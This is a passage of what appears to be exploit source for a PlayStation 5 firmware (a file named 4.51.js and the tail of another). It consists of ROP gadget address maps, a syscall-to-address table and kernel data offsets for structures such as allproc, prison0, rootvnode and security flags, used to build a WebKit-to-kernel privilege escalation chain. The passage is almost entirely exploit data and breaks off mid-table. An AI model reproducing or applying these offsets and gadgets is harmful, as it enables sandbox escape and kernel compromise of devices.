18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00043B7C,
20 | "pop rsi": 0x0008F33E,
21 | "pop rdx": 0x000156EA,
22 | "pop rcx": 0x00060DF3,
23 | "pop r8": 0x01262A4F,
24 | "pop r9" : 0x004E450C,
25 | "pop rax": 0x00084094,
26 | "pop rsp": 0x0005D293,
27 |
28 | "mov [rdi], rsi": 0x00118570,
29 | "mov [rdi], rax": 0x00C3A5C0,
30 | "mov [rdi], eax": 0x003FB6E6,
31 |
32 | "infloop": 0x000109E1,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00204122,
36 | "sete al" : 0x00B7B735,
37 | "seta al" : 0x000CCFB4,
38 | "setb al" : 0x001B7657,
39 | "setg al" : 0x000708c9,
40 | "setl al" : 0x01517692,
41 | "shl rax, 3" : 0x01A43F03,
42 | "add rax, rdx" : 0x016F4948,
43 | "mov rax, [rax]" : 0x0142E309,
44 | "inc dword [rax]": 0x017629AF,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x34230, // sys_exit
49 | 0x002: 0x351E0, // sys_fork
50 | 0x003: 0x33400, // sys_read
51 | 0x004: 0x33360, // sys_write
52 | 0x005: 0x33A00, // sys_open
53 | 0x006: 0x34030, // sys_close
54 | 0x007: 0x32C20, // sys_wait4
55 | 0x00A: 0x34D20, // sys_unlink
56 | 0x00C: 0x346B0, // sys_chdir
57 | 0x00F: 0x340B0, // sys_chmod
58 | 0x014: 0x33580, // sys_getpid
59 | 0x017: 0x33080, // sys_setuid
60 | 0x018: 0x34690, // sys_getuid
61 | 0x019: 0x33A40, // sys_geteuid
62 | 0x01B: 0x33AE0, // sys_recvmsg
63 | 0x01C: 0x33D10, // sys_sendmsg
64 | 0x01D: 0x34860, // sys_recvfrom
65 | 0x01E: 0x32F80, // sys_accept
66 | 0x01F: 0x32DA0, // sys_getpeername
67 | 0x020: 0x34EC0, // sys_getsockname
68 | 0x021: 0x349E0, // sys_access
69 | 0x022: 0x34B60, // sys_chflags
70 | 0x023: 0x34530, // sys_fchflags
71 | 0x024: 0x35410, // sys_sync
72 | 0x025: 0x339E0, // sys_kill
73 | 0x027: 0x33480, // sys_getppid
74 | 0x029: 0x34A40, // sys_dup
75 | 0x02A: 0x333D0, // sys_pipe
76 | 0x02B: 0x35080, // sys_getegid
77 | 0x02C: 0x353D0, // sys_profil
78 | 0x02F: 0x32F20, // sys_getgid
79 | 0x031: 0x32F00, // sys_getlogin
80 | 0x032: 0x34790, // sys_setlogin
81 | 0x035: 0x33140, // sys_sigaltstack
82 | 0x036: 0x332A0, // sys_ioctl
83 | 0x037: 0x34570, // sys_reboot
84 | 0x038: 0x34470, // sys_revoke
85 | 0x03B: 0x34770, // sys_execve
86 | 0x041: 0x34110, // sys_msync
87 | 0x049: 0x33900, // sys_munmap
88 | 0x04A: 0x34670, // sys_mprotect
89 | 0x04B: 0x337F0, // sys_madvise
90 | 0x04E: 0x339C0, // sys_mincore
91 | 0x04F: 0x32E80, // sys_getgroups
92 | 0x050: 0x33420, // sys_setgroups
93 | 0x053: 0x32E60, // sys_setitimer
94 | 0x056: 0x32C80, // sys_getitimer
95 | 0x059: 0x344D0, // sys_getdtablesize
96 | 0x05A: 0x348E0, // sys_dup2
97 | 0x05C: 0x33F10, // sys_fcntl
98 | 0x05D: 0x33A60, // sys_select
99 | 0x05F: 0x32EC0, // sys_fsync
100 | 0x060: 0x33DF0, // sys_setpriority
101 | 0x061: 0x33640, // sys_socket
102 | 0x062: 0x346D0, // sys_connect
103 | 0x063: 0x35040, // sys_netcontrol
104 | 0x064: 0x32C40, // sys_getpriority
105 | 0x065: 0x34C60, // sys_netabort
106 | 0x066: 0x34FE0, // sys_netgetsockinfo
107 | 0x068: 0x34CE0, // sys_bind
108 | 0x069: 0x33F50, // sys_setsockopt
109 | 0x06A: 0x33240, // sys_listen
110 | 0x071: 0x34250, // sys_socketex
111 | 0x072: 0x33C20, // sys_socketclose
112 | 0x074: 0x353F0, // sys_gettimeofday
113 | 0x075: 0x354D0, // sys_getrusage
114 | 0x076: 0x32C00, // sys_getsockopt
115 | 0x078: 0x33E90, // sys_readv
116 | 0x079: 0x33CF0, // sys_writev
117 | 0x07A: 0x34940, // sys_settimeofday
118 | 0x07C: 0x33880, // sys_fchmod
119 | 0x07D: 0x340F0, // sys_netgetiflist
120 | 0x07E: 0x34FC0, // sys_setreuid
121 | 0x07F: 0x33BE0, // sys_setregid
122 | 0x080: 0x34B40, // sys_rename
123 | 0x083: 0x33B60, // sys_flock
124 | 0x085: 0x35430, // sys_sendto
125 | 0x086: 0x35260, // sys_shutdown
126 | 0x087: 0x345F0, // sys_socketpair
127 | 0x088: 0x34390, // sys_mkdir
128 | 0x089: 0x335E0, // sys_rmdir
129 | 0x08A: 0x32AF0, // sys_utimes
130 | 0x08C: 0x34F80, // sys_adjtime
131 | 0x08D: 0x340D0, // sys_kqueueex
132 | 0x093: 0x34330, // sys_setsid
133 | 0x0A5: 0x32E20, // sys_sysarch
134 | 0x0B6: 0x34DC0, // sys_setegid
135 | 0x0B7: 0x32C60, // sys_seteuid
136 | 0x0BC: 0x34E20, // sys_stat
137 | 0x0BD: 0x35220, // sys_fstat
138 | 0x0BE: 0x33C00, // sys_lstat
139 | 0x0BF: 0x33300, // sys_pathconf
140 | 0x0C0: 0x345B0, // sys_fpathconf
141 | 0x0C2: 0x33B40, // sys_getrlimit
142 | 0x0C3: 0x33720, // sys_setrlimit
143 | 0x0C4: 0x34D40, // sys_getdirentries
144 | 0x0CA: 0x34B20, // sys___sysctl
145 | 0x0CB: 0x341D0, // sys_mlock
146 | 0x0CC: 0x34BC0, // sys_munlock
147 | 0x0CE: 0x33680, // sys_futimes
148 | 0x0D1: 0x33C60, // sys_poll
149 | 0x0E8: 0x32D20, // sys_clock_gettime
150 | 0x0E9: 0x34190, // sys_clock_settime
151 | 0x0EA: 0x35190, // sys_clock_getres
152 | 0x0EB: 0x34D60, // sys_ktimer_create
153 | 0x0EC: 0x334E0, // sys_ktimer_delete
154 | 0x0ED: 0x35240, // sys_ktimer_settime
155 | 0x0EE: 0x346F0, // sys_ktimer_gettime
156 | 0x0EF: 0x338A0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34C20, // sys_nanosleep
158 | 0x0F1: 0x34450, // sys_ffclock_getcounter
159 | 0x0F2: 0x33440, // sys_ffclock_setestimate
160 | 0x0F3: 0x342D0, // sys_ffclock_getestimate
161 | 0x0F7: 0x34CC0, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x34880, // sys_issetugid
163 | 0x110: 0x35020, // sys_getdents
164 | 0x121: 0x34730, // sys_preadv
165 | 0x122: 0x33C80, // sys_pwritev
166 | 0x136: 0x33980, // sys_getsid
167 | 0x13B: 0x34E40, // sys_aio_suspend
168 | 0x144: 0x33500, // sys_mlockall
169 | 0x145: 0x34900, // sys_munlockall
170 | 0x147: 0x33600, // sys_sched_setparam
171 | 0x148: 0x34270, // sys_sched_getparam
172 | 0x149: 0x32DC0, // sys_sched_setscheduler
173 | 0x14A: 0x33C40, // sys_sched_getscheduler
174 | 0x14B: 0x33AA0, // sys_sched_yield
175 | 0x14C: 0x33040, // sys_sched_get_priority_max
176 | 0x14D: 0x33160, // sys_sched_get_priority_min
177 | 0x14E: 0x33390, // sys_sched_rr_get_interval
178 | 0x154: 0x32B50, // sys_sigprocmask
179 | 0x155: 0x32B90, // sys_sigsuspend
180 | 0x157: 0x34A60, // sys_sigpending
181 | 0x159: 0x34B80, // sys_sigtimedwait
182 | 0x15A: 0x347C0, // sys_sigwaitinfo
183 | 0x16A: 0x34DA0, // sys_kqueue
184 | 0x16B: 0x33000, // sys_kevent
185 | 0x17B: 0x32FA0, // sys_mtypeprotect
186 | 0x188: 0x330C0, // sys_uuidgen
187 | 0x189: 0x35510, // sys_sendfile
188 | 0x18D: 0x33560, // sys_fstatfs
189 | 0x190: 0x33120, // sys_ksem_close
190 | 0x191: 0x33EB0, // sys_ksem_post
191 | 0x192: 0x34750, // sys_ksem_wait
192 | 0x193: 0x354F0, // sys_ksem_trywait
193 | 0x194: 0x33260, // sys_ksem_init
194 | 0x195: 0x34C80, // sys_ksem_open
195 | 0x196: 0x34960, // sys_ksem_unlink
196 | 0x197: 0x330E0, // sys_ksem_getvalue
197 | 0x198: 0x34920, // sys_ksem_destroy
198 | 0x1A0: 0x34E00, // sys_sigaction
199 | 0x1A1: 0x34AA0, // sys_sigreturn
200 | 0x1A5: 0x33780, // sys_getcontext
201 | 0x1A6: 0x344B0, // sys_setcontext
202 | 0x1A7: 0x345D0, // sys_swapcontext
203 | 0x1AD: 0x337D0, // sys_sigwait
204 | 0x1AE: 0x32EA0, // sys_thr_create
205 | 0x1AF: 0x33200, // sys_thr_exit
206 | 0x1B0: 0x33BA0, // sys_thr_self
207 | 0x1B1: 0x33220, // sys_thr_kill
208 | 0x1B9: 0x34840, // sys_ksem_timedwait
209 | 0x1BA: 0x32B70, // sys_thr_suspend
210 | 0x1BB: 0x334A0, // sys_thr_wake
211 | 0x1BC: 0x34510, // sys_kldunloadf
212 | 0x1C6: 0x35200, // sys__umtx_op
213 | 0x1C7: 0x34F40, // sys_thr_new
214 | 0x1C8: 0x34EA0, // sys_sigqueue
215 | 0x1D0: 0x34800, // sys_thr_set_name
216 | 0x1D2: 0x33DB0, // sys_rtprio_thread
217 | 0x1DB: 0x33540, // sys_pread
218 | 0x1DC: 0x34650, // sys_pwrite
219 | 0x1DD: 0x34F20, // sys_mmap
220 | 0x1DE: 0x34A20, // sys_lseek
221 | 0x1DF: 0x33AC0, // sys_truncate
222 | 0x1E0: 0x33520, // sys_ftruncate
223 | 0x1E1: 0x32B10, // sys_thr_kill2
224 | 0x1E2: 0x35490, // sys_shm_open
225 | 0x1E3: 0x34F00, // sys_shm_unlink
226 | 0x1E6: 0x33740, // sys_cpuset_getid
227 | 0x1E7: 0x35300, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34AC0, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32EE0, // sys_openat
230 | 0x203: 0x34590, // sys___cap_rights_get
231 | 0x20A: 0x33FD0, // sys_pselect
232 | 0x214: 0x34090, // sys_regmgr_call
233 | 0x215: 0x33E10, // sys_jitshm_create
234 | 0x216: 0x343F0, // sys_jitshm_alias
235 | 0x217: 0x332E0, // sys_dl_get_list
236 | 0x218: 0x34130, // sys_dl_get_info
237 | 0x21A: 0x34070, // sys_evf_create
238 | 0x21B: 0x334C0, // sys_evf_delete
239 | 0x21C: 0x34410, // sys_evf_open
240 | 0x21D: 0x33FF0, // sys_evf_close
241 | 0x21E: 0x342B0, // sys_evf_wait
242 | 0x21F: 0x34A80, // sys_evf_trywait
243 | 0x220: 0x34430, // sys_evf_set
244 | 0x221: 0x349A0, // sys_evf_clear
245 | 0x222: 0x337B0, // sys_evf_cancel
246 | 0x223: 0x34290, // sys_query_memory_protection
247 | 0x224: 0x33B80, // sys_batch_map
248 | 0x225: 0x33D90, // sys_osem_create
249 | 0x226: 0x32D60, // sys_osem_delete
250 | 0x227: 0x32CE0, // sys_osem_open
251 | 0x228: 0x352E0, // sys_osem_close
252 | 0x229: 0x34370, // sys_osem_wait
253 | 0x22A: 0x34980, // sys_osem_trywait
254 | 0x22B: 0x34610, // sys_osem_post
255 | 0x22C: 0x33EF0, // sys_osem_cancel
256 | 0x22D: 0x33CA0, // sys_namedobj_create
257 | 0x22E: 0x339A0, // sys_namedobj_delete
258 | 0x22F: 0x35570, // sys_set_vm_container
259 | 0x230: 0x33460, // sys_debug_init
260 | 0x233: 0x33DD0, // sys_opmc_enable
261 | 0x234: 0x32E40, // sys_opmc_disable
262 | 0x235: 0x33E50, // sys_opmc_set_ctl
263 | 0x236: 0x33E70, // sys_opmc_set_ctr
264 | 0x237: 0x348C0, // sys_opmc_get_ctr
265 | 0x23C: 0x336E0, // sys_virtual_query
266 | 0x249: 0x34D00, // sys_is_in_sandbox
267 | 0x24A: 0x338C0, // sys_dmem_container
268 | 0x24B: 0x34170, // sys_get_authinfo
269 | 0x24C: 0x32CC0, // sys_mname
270 | 0x24F: 0x332C0, // sys_dynlib_dlsym
271 | 0x250: 0x335C0, // sys_dynlib_get_list
272 | 0x251: 0x35060, // sys_dynlib_get_info
273 | 0x252: 0x33F70, // sys_dynlib_load_prx
274 | 0x253: 0x32F60, // sys_dynlib_unload_prx
275 | 0x254: 0x34DE0, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x33D70, // sys_dynlib_get_proc_param
277 | 0x257: 0x350C0, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32B30, // sys_sandbox_path
279 | 0x259: 0x336A0, // sys_mdbg_service
280 | 0x25A: 0x33D30, // sys_randomized_path
281 | 0x25B: 0x34BA0, // sys_rdup
282 | 0x25C: 0x331A0, // sys_dl_get_metadata
283 | 0x25D: 0x338E0, // sys_workaround8849
284 | 0x25E: 0x330A0, // sys_is_development_mode
285 | 0x25F: 0x34210, // sys_get_self_auth_info
286 | 0x260: 0x354B0, // sys_dynlib_get_info_ex
287 | 0x262: 0x35550, // sys_budget_get_ptype
288 | 0x263: 0x333B0, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x352C0, // sys_get_proc_type_info
290 | 0x265: 0x32AD0, // sys_get_resident_count
291 | 0x267: 0x33E30, // sys_get_resident_fmem_count
292 | 0x268: 0x34EE0, // sys_thr_get_name
293 | 0x269: 0x344F0, // sys_set_gpo
294 | 0x26A: 0x341F0, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32FE0, // sys_test_debug_rwmem
296 | 0x26C: 0x33100, // sys_free_stack
297 | 0x26E: 0x32D00, // sys_ipmimgr_call
298 | 0x26F: 0x34150, // sys_get_gpo
299 | 0x270: 0x35530, // sys_get_vm_map_timestamp
300 | 0x271: 0x34AE0, // sys_opmc_set_hw
301 | 0x272: 0x33620, // sys_opmc_get_hw
302 | 0x273: 0x32CA0, // sys_get_cpu_usage_all
303 | 0x274: 0x34310, // sys_mmap_dmem
304 | 0x275: 0x336C0, // sys_physhm_open
305 | 0x276: 0x33ED0, // sys_physhm_unlink
306 | 0x278: 0x35470, // sys_thr_suspend_ucontext
307 | 0x279: 0x33960, // sys_thr_resume_ucontext
308 | 0x27A: 0x33920, // sys_thr_get_ucontext
309 | 0x27B: 0x33A20, // sys_thr_set_ucontext
310 | 0x27C: 0x33660, // sys_set_timezone_info
311 | 0x27D: 0x343B0, // sys_set_phys_fmem_limit
312 | 0x27E: 0x33760, // sys_utc_to_localtime
313 | 0x27F: 0x35590, // sys_localtime_to_utc
314 | 0x280: 0x34710, // sys_set_uevt
315 | 0x281: 0x33280, // sys_get_cpu_usage_proc
316 | 0x282: 0x33B00, // sys_get_map_statistics
317 | 0x283: 0x348A0, // sys_set_chicken_switches
318 | 0x286: 0x351C0, // sys_get_kernel_mem_statistics
319 | 0x287: 0x343D0, // sys_get_sdk_compiled_version
320 | 0x288: 0x32D40, // sys_app_state_change
321 | 0x289: 0x34F60, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32DE0, // sys_process_terminate
323 | 0x28D: 0x335A0, // sys_blockpool_open
324 | 0x28E: 0x33340, // sys_blockpool_map
325 | 0x28F: 0x34D80, // sys_blockpool_unmap
326 | 0x290: 0x349C0, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x33A80, // sys_blockpool_batch
328 | 0x292: 0x331E0, // sys_fdatasync
329 | 0x293: 0x33700, // sys_dynlib_get_list2
330 | 0x294: 0x35450, // sys_dynlib_get_info2
331 | 0x295: 0x34C00, // sys_aio_submit
332 | 0x296: 0x33180, // sys_aio_multi_delete
333 | 0x297: 0x33FB0, // sys_aio_multi_wait
334 | 0x298: 0x33060, // sys_aio_multi_poll
335 | 0x299: 0x34B00, // sys_aio_get_data
336 | 0x29A: 0x33F90, // sys_aio_multi_cancel
337 | 0x29B: 0x32F40, // sys_get_bio_usage_all
338 | 0x29C: 0x34630, // sys_aio_create
339 | 0x29D: 0x350A0, // sys_aio_submit_cmd
340 | 0x29E: 0x34FA0, // sys_aio_init
341 | 0x29F: 0x34A00, // sys_get_page_table_stats
342 | 0x2A0: 0x34E60, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x35000, // sys_blockpool_move
344 | 0x2A2: 0x34E80, // sys_virtual_query_all
345 | 0x2A3: 0x33F30, // sys_reserve_2mb_page
346 | 0x2A4: 0x347E0, // sys_cpumode_yield
347 | 0x2A5: 0x342F0, // sys_wait6
348 | 0x2A6: 0x33D50, // sys_cap_rights_limit
349 | 0x2A7: 0x33320, // sys_cap_ioctls_limit
350 | 0x2A8: 0x34050, // sys_cap_ioctls_get
351 | 0x2A9: 0x34820, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32FC0, // sys_cap_fcntls_get
353 | 0x2AB: 0x35320, // sys_bindat
354 | 0x2AC: 0x33B20, // sys_connectat
355 | 0x2AD: 0x32D80, // sys_chflagsat
356 | 0x2AE: 0x32BD0, // sys_accept4
357 | 0x2AF: 0x331C0, // sys_pipe2
358 | 0x2B0: 0x33BC0, // sys_aio_mlock
359 | 0x2B1: 0x352A0, // sys_procctl
360 | 0x2B2: 0x34550, // sys_ppoll
361 | 0x2B3: 0x34490, // sys_futimens
362 | 0x2B4: 0x34C40, // sys_utimensat
363 | 0x2B5: 0x341B0, // sys_numa_getaffinity
364 | 0x2B6: 0x34010, // sys_numa_setaffinity
365 | 0x2C1: 0x33020, // sys_get_phys_page_size
366 | 0x2C9: 0x35280, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x33860, // sys_openintr
368 | 0x2CD: 0x34350, // sys_dl_get_info_2
369 | 0x2CE: 0x33940, // sys_acinfo_add
370 | 0x2CF: 0x32BB0, // sys_acinfo_delete
371 | 0x2D0: 0x34BE0, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x34CA0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32E00, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x88F7;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x3188F7;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xF188F7;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x27EDCB8;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6506474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x650647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6506498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6506500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1D34D00;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x66E74C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/4.51.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00D04580;
2 | const OFFSET_wk_memset_import = 0x028F9D38;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028F9A18;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x00001B60;
7 | const OFFSET_lk_pthread_join = 0x0002FAD0;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x000148F0;
12 | const OFFSET_lc_setjmp = 0x0005E9B0;
13 | const OFFSET_lc_longjmp = 0x0005EA00;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00043B7C,
20 | "pop rsi": 0x0008F33E,
21 | "pop rdx": 0x000156EA,
22 | "pop rcx": 0x00060DF3,
23 | "pop r8": 0x01262A4F,
24 | "pop r9" : 0x004E450C,
25 | "pop rax": 0x00084094,
26 | "pop rsp": 0x0005D293,
27 |
28 | "mov [rdi], rsi": 0x00118570,
29 | "mov [rdi], rax": 0x00C3A5C0,
30 | "mov [rdi], eax": 0x003FB6E6,
31 |
32 | "infloop": 0x000109E1,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00204122,
36 | "sete al" : 0x00B7B735,
37 | "seta al" : 0x000CCFB4,
38 | "setb al" : 0x001B7657,
39 | "setg al" : 0x000708c9,
40 | "setl al" : 0x01517692,
41 | "shl rax, 3" : 0x01A43F03,
42 | "add rax, rdx" : 0x016F4948,
43 | "mov rax, [rax]" : 0x0142E309,
44 | "inc dword [rax]": 0x017629AF,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x34230, // sys_exit
49 | 0x002: 0x351E0, // sys_fork
50 | 0x003: 0x33400, // sys_read
51 | 0x004: 0x33360, // sys_write
52 | 0x005: 0x33A00, // sys_open
53 | 0x006: 0x34030, // sys_close
54 | 0x007: 0x32C20, // sys_wait4
55 | 0x00A: 0x34D20, // sys_unlink
56 | 0x00C: 0x346B0, // sys_chdir
57 | 0x00F: 0x340B0, // sys_chmod
58 | 0x014: 0x33580, // sys_getpid
59 | 0x017: 0x33080, // sys_setuid
60 | 0x018: 0x34690, // sys_getuid
61 | 0x019: 0x33A40, // sys_geteuid
62 | 0x01B: 0x33AE0, // sys_recvmsg
63 | 0x01C: 0x33D10, // sys_sendmsg
64 | 0x01D: 0x34860, // sys_recvfrom
65 | 0x01E: 0x32F80, // sys_accept
66 | 0x01F: 0x32DA0, // sys_getpeername
67 | 0x020: 0x34EC0, // sys_getsockname
68 | 0x021: 0x349E0, // sys_access
69 | 0x022: 0x34B60, // sys_chflags
70 | 0x023: 0x34530, // sys_fchflags
71 | 0x024: 0x35410, // sys_sync
72 | 0x025: 0x339E0, // sys_kill
73 | 0x027: 0x33480, // sys_getppid
74 | 0x029: 0x34A40, // sys_dup
75 | 0x02A: 0x333D0, // sys_pipe
76 | 0x02B: 0x35080, // sys_getegid
77 | 0x02C: 0x353D0, // sys_profil
78 | 0x02F: 0x32F20, // sys_getgid
79 | 0x031: 0x32F00, // sys_getlogin
80 | 0x032: 0x34790, // sys_setlogin
81 | 0x035: 0x33140, // sys_sigaltstack
82 | 0x036: 0x332A0, // sys_ioctl
83 | 0x037: 0x34570, // sys_reboot
84 | 0x038: 0x34470, // sys_revoke
85 | 0x03B: 0x34770, // sys_execve
86 | 0x041: 0x34110, // sys_msync
87 | 0x049: 0x33900, // sys_munmap
88 | 0x04A: 0x34670, // sys_mprotect
89 | 0x04B: 0x337F0, // sys_madvise
90 | 0x04E: 0x339C0, // sys_mincore
91 | 0x04F: 0x32E80, // sys_getgroups
92 | 0x050: 0x33420, // sys_setgroups
93 | 0x053: 0x32E60, // sys_setitimer
94 | 0x056: 0x32C80, // sys_getitimer
95 | 0x059: 0x344D0, // sys_getdtablesize
96 | 0x05A: 0x348E0, // sys_dup2
97 | 0x05C: 0x33F10, // sys_fcntl
98 | 0x05D: 0x33A60, // sys_select
99 | 0x05F: 0x32EC0, // sys_fsync
100 | 0x060: 0x33DF0, // sys_setpriority
101 | 0x061: 0x33640, // sys_socket
102 | 0x062: 0x346D0, // sys_connect
103 | 0x063: 0x35040, // sys_netcontrol
104 | 0x064: 0x32C40, // sys_getpriority
105 | 0x065: 0x34C60, // sys_netabort
106 | 0x066: 0x34FE0, // sys_netgetsockinfo
107 | 0x068: 0x34CE0, // sys_bind
108 | 0x069: 0x33F50, // sys_setsockopt
109 | 0x06A: 0x33240, // sys_listen
110 | 0x071: 0x34250, // sys_socketex
111 | 0x072: 0x33C20, // sys_socketclose
112 | 0x074: 0x353F0, // sys_gettimeofday
113 | 0x075: 0x354D0, // sys_getrusage
114 | 0x076: 0x32C00, // sys_getsockopt
115 | 0x078: 0x33E90, // sys_readv
116 | 0x079: 0x33CF0, // sys_writev
117 | 0x07A: 0x34940, // sys_settimeofday
118 | 0x07C: 0x33880, // sys_fchmod
119 | 0x07D: 0x340F0, // sys_netgetiflist
120 | 0x07E: 0x34FC0, // sys_setreuid
121 | 0x07F: 0x33BE0, // sys_setregid
122 | 0x080: 0x34B40, // sys_rename
123 | 0x083: 0x33B60, // sys_flock
124 | 0x085: 0x35430, // sys_sendto
125 | 0x086: 0x35260, // sys_shutdown
126 | 0x087: 0x345F0, // sys_socketpair
127 | 0x088: 0x34390, // sys_mkdir
128 | 0x089: 0x335E0, // sys_rmdir
129 | 0x08A: 0x32AF0, // sys_utimes
130 | 0x08C: 0x34F80, // sys_adjtime
131 | 0x08D: 0x340D0, // sys_kqueueex
132 | 0x093: 0x34330, // sys_setsid
133 | 0x0A5: 0x32E20, // sys_sysarch
134 | 0x0B6: 0x34DC0, // sys_setegid
135 | 0x0B7: 0x32C60, // sys_seteuid
136 | 0x0BC: 0x34E20, // sys_stat
137 | 0x0BD: 0x35220, // sys_fstat
138 | 0x0BE: 0x33C00, // sys_lstat
139 | 0x0BF: 0x33300, // sys_pathconf
140 | 0x0C0: 0x345B0, // sys_fpathconf
141 | 0x0C2: 0x33B40, // sys_getrlimit
142 | 0x0C3: 0x33720, // sys_setrlimit
143 | 0x0C4: 0x34D40, // sys_getdirentries
144 | 0x0CA: 0x34B20, // sys___sysctl
145 | 0x0CB: 0x341D0, // sys_mlock
146 | 0x0CC: 0x34BC0, // sys_munlock
147 | 0x0CE: 0x33680, // sys_futimes
148 | 0x0D1: 0x33C60, // sys_poll
149 | 0x0E8: 0x32D20, // sys_clock_gettime
150 | 0x0E9: 0x34190, // sys_clock_settime
151 | 0x0EA: 0x35190, // sys_clock_getres
152 | 0x0EB: 0x34D60, // sys_ktimer_create
153 | 0x0EC: 0x334E0, // sys_ktimer_delete
154 | 0x0ED: 0x35240, // sys_ktimer_settime
155 | 0x0EE: 0x346F0, // sys_ktimer_gettime
156 | 0x0EF: 0x338A0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34C20, // sys_nanosleep
158 | 0x0F1: 0x34450, // sys_ffclock_getcounter
159 | 0x0F2: 0x33440, // sys_ffclock_setestimate
160 | 0x0F3: 0x342D0, // sys_ffclock_getestimate
161 | 0x0F7: 0x34CC0, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x34880, // sys_issetugid
163 | 0x110: 0x35020, // sys_getdents
164 | 0x121: 0x34730, // sys_preadv
165 | 0x122: 0x33C80, // sys_pwritev
166 | 0x136: 0x33980, // sys_getsid
167 | 0x13B: 0x34E40, // sys_aio_suspend
168 | 0x144: 0x33500, // sys_mlockall
169 | 0x145: 0x34900, // sys_munlockall
170 | 0x147: 0x33600, // sys_sched_setparam
171 | 0x148: 0x34270, // sys_sched_getparam
172 | 0x149: 0x32DC0, // sys_sched_setscheduler
173 | 0x14A: 0x33C40, // sys_sched_getscheduler
174 | 0x14B: 0x33AA0, // sys_sched_yield
175 | 0x14C: 0x33040, // sys_sched_get_priority_max
176 | 0x14D: 0x33160, // sys_sched_get_priority_min
177 | 0x14E: 0x33390, // sys_sched_rr_get_interval
178 | 0x154: 0x32B50, // sys_sigprocmask
179 | 0x155: 0x32B90, // sys_sigsuspend
180 | 0x157: 0x34A60, // sys_sigpending
181 | 0x159: 0x34B80, // sys_sigtimedwait
182 | 0x15A: 0x347C0, // sys_sigwaitinfo
183 | 0x16A: 0x34DA0, // sys_kqueue
184 | 0x16B: 0x33000, // sys_kevent
185 | 0x17B: 0x32FA0, // sys_mtypeprotect
186 | 0x188: 0x330C0, // sys_uuidgen
187 | 0x189: 0x35510, // sys_sendfile
188 | 0x18D: 0x33560, // sys_fstatfs
189 | 0x190: 0x33120, // sys_ksem_close
190 | 0x191: 0x33EB0, // sys_ksem_post
191 | 0x192: 0x34750, // sys_ksem_wait
192 | 0x193: 0x354F0, // sys_ksem_trywait
193 | 0x194: 0x33260, // sys_ksem_init
194 | 0x195: 0x34C80, // sys_ksem_open
195 | 0x196: 0x34960, // sys_ksem_unlink
196 | 0x197: 0x330E0, // sys_ksem_getvalue
197 | 0x198: 0x34920, // sys_ksem_destroy
198 | 0x1A0: 0x34E00, // sys_sigaction
199 | 0x1A1: 0x34AA0, // sys_sigreturn
200 | 0x1A5: 0x33780, // sys_getcontext
201 | 0x1A6: 0x344B0, // sys_setcontext
202 | 0x1A7: 0x345D0, // sys_swapcontext
203 | 0x1AD: 0x337D0, // sys_sigwait
204 | 0x1AE: 0x32EA0, // sys_thr_create
205 | 0x1AF: 0x33200, // sys_thr_exit
206 | 0x1B0: 0x33BA0, // sys_thr_self
207 | 0x1B1: 0x33220, // sys_thr_kill
208 | 0x1B9: 0x34840, // sys_ksem_timedwait
209 | 0x1BA: 0x32B70, // sys_thr_suspend
210 | 0x1BB: 0x334A0, // sys_thr_wake
211 | 0x1BC: 0x34510, // sys_kldunloadf
212 | 0x1C6: 0x35200, // sys__umtx_op
213 | 0x1C7: 0x34F40, // sys_thr_new
214 | 0x1C8: 0x34EA0, // sys_sigqueue
215 | 0x1D0: 0x34800, // sys_thr_set_name
216 | 0x1D2: 0x33DB0, // sys_rtprio_thread
217 | 0x1DB: 0x33540, // sys_pread
218 | 0x1DC: 0x34650, // sys_pwrite
219 | 0x1DD: 0x34F20, // sys_mmap
220 | 0x1DE: 0x34A20, // sys_lseek
221 | 0x1DF: 0x33AC0, // sys_truncate
222 | 0x1E0: 0x33520, // sys_ftruncate
223 | 0x1E1: 0x32B10, // sys_thr_kill2
224 | 0x1E2: 0x35490, // sys_shm_open
225 | 0x1E3: 0x34F00, // sys_shm_unlink
226 | 0x1E6: 0x33740, // sys_cpuset_getid
227 | 0x1E7: 0x35300, // sys_cpuset_getaffinity
